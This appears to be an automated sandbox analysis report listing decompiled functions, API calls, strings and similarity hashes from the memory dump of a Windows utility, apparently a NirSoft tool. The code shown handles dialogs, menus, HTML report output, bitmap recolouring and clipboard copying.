GetTickCount.KERNEL32 ref: 004038F8
GetParent.USER32(?), ref: 00403921
SendMessageW.USER32(00000000), ref: 00403928
BeginDeferWindowPos.USER32 ref: 00403936
EndDeferWindowPos.USER32(?), ref: 00403998
InvalidateRect.USER32(?,?,00000001), ref: 004039A4

Strings

A, xrefs: 004038E5

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7CE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040DFD6();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040DFD6();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040DFD6();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040DFD6();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x0040d7e1
0x0040d7e6
0x0040d7e7
0x0040d7e8
0x0040d875
0x0040d87c
0x0040d88a
0x0040d891
0x0040d89f
0x0040d8a6
0x0040d8c0
0x0040d8cb
0x0040d8dd
0x0040d8fb
0x0040d900
0x00000000
0x0040d900
0x0040d7f5
0x0040d7fc
0x0040d80a
0x0040d811
0x0040d82b
0x0040d838
0x0040d84a
0x00000000

APIs

memset.MSVCRT ref: 0040D7FC
memset.MSVCRT ref: 0040D811
_snwprintf.MSVCRT ref: 0040D82B
_snwprintf.MSVCRT ref: 0040D84A
memset.MSVCRT ref: 0040D87C
memset.MSVCRT ref: 0040D891
memset.MSVCRT ref: 0040D8A6
_snwprintf.MSVCRT ref: 0040D8C0
_snwprintf.MSVCRT ref: 0040D8DD

Strings

%%0.%df, xrefs: 0040D81E, 0040D8B3

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407047, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040E340(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x4131d0; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00406CC6(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00406DE5(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E00406F88, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00406CC6(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x412c34 =  *0x412c34 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E00406E97(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x0040704f
0x00407054
0x0040705b
0x00407098
0x0040709c
0x004070a2
0x004070aa
0x004070ac
0x004070c2
0x004070c2
0x004070c7
0x004070c8
0x004070e2
0x004070e4
0x004070e6
0x004070e9
0x004070fc
0x004070fc
0x0040710c
0x00407113
0x0040712a
0x00407130
0x00407137
0x00407146
0x0040714b
0x00407157
0x00407160
0x004070ae
0x004070bc
0x004070bc
0x004070be
0x004070c0
0x00000000
0x00000000
0x004070b0
0x004070b3
0x004070b9
0x004070b9
0x00000000
0x004070b9
0x00000000
0x004070b3
0x00000000
0x004070bc
0x004070ac
0x0040705d
0x0040705d
0x00407062
0x00407063
0x00407068
0x0040706f
0x00407075
0x0040707c
0x0040707e
0x00407080
0x00407081
0x00407084
0x0040708d
0x0040708d
0x00407166
0x0040716d

APIs

LoadMenuW.USER32 ref: 0040706F

Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20

DestroyMenu.USER32(00000000), ref: 0040708D
CreateDialogParamW.USER32 ref: 004070E2
GetDesktopWindow.USER32 ref: 004070ED
CreateDialogParamW.USER32 ref: 004070FA
memset.MSVCRT ref: 00407113
GetWindowTextW.USER32 ref: 0040712A
EnumChildWindows.USER32 ref: 00407157
DestroyWindow.USER32(00000005), ref: 00407160

Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB

Strings

caption, xrefs: 00407141

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00409D04, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040E340(0x1800, __ecx);
				_t57 = _t49;
				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x412ed0; // 0x0
				if(_t62 != 0) {
					_push(0x412ed0);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040DFD6();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x412ecc; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040DFD6();
				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00409336(_t57, _t64, _a4);
				}
				return _t43;
			}

0x00409d04
0x00409d0c
0x00409d1c
0x00409d20
0x00409d35
0x00409d3c
0x00409d4a
0x00409d51
0x00409d5f
0x00409d66
0x00409d6b
0x00409d6e
0x00409d7a
0x00409d7c
0x00409d81
0x00409d8c
0x00409d8d
0x00409d8e
0x00409d93
0x00409d93
0x00409d96
0x00409d9c
0x00409daa
0x00409db0
0x00409dcb
0x00409de5
0x00409de6
0x00409df1
0x00409df2
0x00409df3
0x00409e07
0x00409e0c
0x00409e10
0x00000000
0x00409e15
0x00409e1e

APIs

memset.MSVCRT ref: 00409D3C
memset.MSVCRT ref: 00409D51
memset.MSVCRT ref: 00409D66
_snwprintf.MSVCRT ref: 00409D8E
wcscpy.MSVCRT ref: 00409DAA
_snwprintf.MSVCRT ref: 00409DF3

Strings

<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
<table dir="rtl"><tr><td>, xrefs: 00409DA4

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040546C(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E004059AA( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040caf2
0x0040cb00
0x0040cb0b
0x0040cb14
0x0040cb33
0x0040cb3b
0x0040cb83
0x0040cbcc
0x0040cb85
0x0040cb8b
0x0040cb99
0x0040cba5
0x0040cbb4
0x0040cbb9
0x0040cbc0
0x0040cbc5
0x0040cb3d
0x0040cb43
0x0040cb51
0x0040cb5d
0x0040cb6a
0x0040cb75
0x0040cb7a
0x0040cbd4
0x0040cbd7
0x0040cbd7
0x0040cb19
0x0040cb1a
0x0040cb1b
0x00000000
0x0040cb21
0x0040cb02
0x00000000

APIs

wcschr.MSVCRT ref: 0040CB0B
wcscpy.MSVCRT ref: 0040CB1B

Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0

wcscpy.MSVCRT ref: 0040CB6A
wcscat.MSVCRT ref: 0040CB75
memset.MSVCRT ref: 0040CB51

Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0

memset.MSVCRT ref: 0040CB99
memcpy.MSVCRT ref: 0040CBB4
wcscat.MSVCRT ref: 0040CBC0

Strings

\systemroot, xrefs: 0040CB28

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DE1, Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00402DE1(void* __fp0) {
				void* _v24;
				void _v28;
				void* _v56;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				intOrPtr _v84;
				long _v88;
				intOrPtr _v92;
				int _v96;
				int _v100;
				intOrPtr _v104;
				int _v108;
				int _v112;
				intOrPtr _v128;
				unsigned int _t51;
				signed char _t52;
				intOrPtr _t53;
				intOrPtr _t64;
				struct HDC__* _t75;

				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v56, 0x18,  &_v28);
				_t75 = CreateCompatibleDC(0);
				_v64 = SelectObject(_t75, _v72);
				_v72 = GetSysColor(0xf);
				_v88 = GetPixel(_t75, 0, 0);
				_v96 = 0;
				if(_v56 > 0) {
					do {
						_v100 = 0;
						if(_v60 > 0) {
							do {
								_t51 = GetPixel(_t75, _v100, _v96);
								if(_t51 != _v100) {
									_t52 = _t51 & 0x000000ff;
									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
									asm("fild dword [esp+0x20]");
									asm("fistp qword [esp+0x28]");
									_t64 = _v84;
									_v92 = _t64;
									asm("fisub dword [esp+0x20]");
									asm("fldz");
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t52 & 0x00000041) == 0) {
										asm("fchs");
									}
									asm("fcomp qword [0x410b70]");
									asm("fnstsw ax");
									_t53 = _t64 + 1;
									if((_t52 & 0x00000001) != 0) {
										_t53 = _t64;
									}
									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
								} else {
									_push(_v96);
								}
								SetPixel(_t75, _v112, _v108, ??);
								_v128 = _v128 + 1;
							} while (_v128 < _v88);
						}
						_v96 = _v96 + 1;
					} while (_v96 < _v56);
				}
				SelectObject(_t75, _v76);
				DeleteDC(_t75);
				return _v104;
			}

0x00402e07
0x00402e0d
0x00402e15
0x00402e16
0x00402e17
0x00402e18
0x00402e19
0x00402e25
0x00402e36
0x00402e41
0x00402e54
0x00402e5e
0x00402e62
0x00402e66
0x00402e6c
0x00402e70
0x00402e74
0x00402e7a
0x00402e83
0x00402e89
0x00402e9c
0x00402ea3
0x00402ea7
0x00402eb3
0x00402eb7
0x00402ebb
0x00402ebf
0x00402ec3
0x00402ec5
0x00402ec7
0x00402ecc
0x00402ece
0x00402ece
0x00402ed0
0x00402ed6
0x00402edb
0x00402ede
0x00402ee0
0x00402ee0
0x00402ef6
0x00402e8b
0x00402e8b
0x00402e8b
0x00402f00
0x00402f06
0x00402f0e
0x00402e7a
0x00402f18
0x00402f20
0x00402e6c
0x00402f2f
0x00402f36
0x00402f46

APIs

GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
LoadImageW.USER32 ref: 00402E01
GetObjectW.GDI32(?,00000018,?), ref: 00402E25
CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
SelectObject.GDI32(00000000,?), ref: 00402E39
GetSysColor.USER32(0000000F), ref: 00402E45
GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
GetPixel.GDI32(00000000,?,?), ref: 00402E83
SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
SelectObject.GDI32(00000000,?), ref: 00402F2F
DeleteDC.GDI32(00000000), ref: 00402F36

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00405F82, Relevance: 16.6, APIs: 11, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405F82() {
				int _v8;
				int _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				struct HDC__* _t46;

				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v52 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v16, 0x18,  &_v52);
				_t46 = CreateCompatibleDC(0);
				_v28 = SelectObject(_t46, _v16);
				_v24 = GetSysColor(0xf);
				_v20 = GetPixel(_t46, 0, 0);
				_v12 = 0;
				if(_v44 > 0) {
					do {
						_v8 = 0;
						if(_v48 > 0) {
							do {
								if(GetPixel(_t46, _v8, _v12) == _v20) {
									SetPixel(_t46, _v8, _v12, _v24);
								}
								_v8 = _v8 + 1;
							} while (_v8 < _v48);
						}
						_v12 = _v12 + 1;
					} while (_v12 < _v44);
				}
				SelectObject(_t46, _v28);
				DeleteDC(_t46);
				return _v16;
			}

0x00405fa5
0x00405faa
0x00405fb0
0x00405fb1
0x00405fb2
0x00405fb3
0x00405fb4
0x00405fbe
0x00405fce
0x00405fd9
0x00405feb
0x00405ff3
0x00405ff6
0x00405ff9
0x00405ffb
0x00405ffe
0x00406001
0x00406003
0x0040600f
0x0040601b
0x0040601b
0x00406021
0x00406027
0x00406003
0x0040602c
0x00406032
0x00405ffb
0x0040603b
0x00406042
0x0040604f

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
LoadImageW.USER32 ref: 00405F9F
GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
SelectObject.GDI32(00000000,?), ref: 00405FD1
GetSysColor.USER32(0000000F), ref: 00405FDC
GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
GetPixel.GDI32(00000000,?,?), ref: 0040600A
SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
SelectObject.GDI32(00000000,?), ref: 0040603B
DeleteDC.GDI32(00000000), ref: 00406042

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
String ID:
API String ID: 2468767547-0
Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405559, Relevance: 16.6, APIs: 11, Instructions: 59
clipboardmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t17;
				void* _t32;
				void* _t37;
				long _t39;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t17 = E00405338(_a4);
				_v12 = _t17;
				if(_t17 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t39 = GetFileSize(_t17, 0);
					_t5 = _t39 + 2; // 0x2
					_t32 = GlobalAlloc(0x2000, _t5);
					if(_t32 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t37 = GlobalLock(_t32);
						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
							GlobalUnlock(_t32);
							SetClipboardData(0xd, _t32);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

0x0040555f
0x00405563
0x0040556c
0x00405575
0x00405578
0x004055f1
0x0040557a
0x00405586
0x00405588
0x00405597
0x0040559b
0x004055d4
0x004055da
0x0040559d
0x004055a6
0x004055b9
0x00000000
0x004055bb
0x004055bd
0x004055c3
0x004055cc
0x004055cc
0x004055b9
0x004055e0
0x004055e8
0x004055f4
0x004055fe

APIs

EmptyClipboard.USER32 ref: 00405563

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
GlobalLock.KERNEL32 ref: 0040559E
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
GlobalUnlock.KERNEL32(00000000), ref: 004055C3
SetClipboardData.USER32 ref: 004055CC
GetLastError.KERNEL32 ref: 004055D4
CloseHandle.KERNEL32(?), ref: 004055E0
GetLastError.KERNEL32 ref: 004055EB
CloseClipboard.USER32 ref: 004055F4

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040228C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				struct _SYSTEMTIME _v88;
				void* _v92;
				struct _FILETIME _v96;
				void* __edi;
				signed int _t29;
				signed int _t34;
				signed int _t39;
				char* _t44;
				void* _t56;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t77;
				long _t90;
				intOrPtr _t91;
				void* _t97;
				signed int _t98;
				signed int _t99;

				_t97 = __esi;
				_t81 =  *((intOrPtr*)(__esi + 0x10));
				_t91 = _a4;
				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
				_t77 = 0x40f454;
				if(_t29 != 0) {
					_t77 = _t29;
				}
				_t99 = _t98 | 0xffffffff;
				_t106 =  *(_t97 + 0x40) & 0x00004000;
				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
					E004063DD(_t99, _t81, _t91, _t106, ".");
				}
				E004063DD(_t99, _t81, _t91, _t106, _t77);
				_t78 = "\t";
				E004063DD(_t99, _t81, _t91, _t106, "\t");
				_t107 =  *(_t97 + 0x40) & 0x00004000;
				_t34 = _t99;
